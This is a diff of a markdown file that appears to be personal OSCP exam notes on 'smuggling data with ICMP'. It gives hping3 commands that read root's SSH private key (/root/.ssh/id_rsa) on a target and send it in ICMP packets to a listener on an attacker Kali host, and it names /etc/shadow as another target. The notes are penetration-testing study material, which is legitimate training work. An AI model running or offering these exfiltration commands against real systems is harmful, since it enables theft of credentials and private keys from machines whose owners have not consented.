generalVader01/nextGenCoding/OSCP_Notes.md

 # Smuggling Data With ICMP

 Summary: Tools like hping3 can be used to read local files and send the contents of it to a remote host.
 	 This is useful to read /etc/shadow or root's id_rsa.
+  	 Note that the -d option means amount of bytes to output with 1 packet
+    	 It is recommended to do -c 1 unless the file is massive

-# On Target machine, outputting to other local session:
+On Target machine, outputting to other local session:
-	hping3 --icmp 127.0.0.1 -d 100 --sign signature --file /root/.ssh/id_rsa
+	hping3 --icmp 127.0.0.1 -d 2602 --sign signature --file /root/.ssh/id_rsa -c 1

-# Receiver Side:
+Receiver Side:
  	sudo hping3 --icmp 127.0.0.1 --listen signature --safe

-# On Target machine, outputing to Kali:
-  	hping3 --icmp 192.168.x.x -d 100 --file /root/.ssh/id_rsa
+On Target machine, outputing to Kali: hping3 --icmp 192.168.x.x -d 100 --file /root/.ssh/id_rsa

-# On kali machine
+On kali machine
   	sudo python ./icmp_receiver.py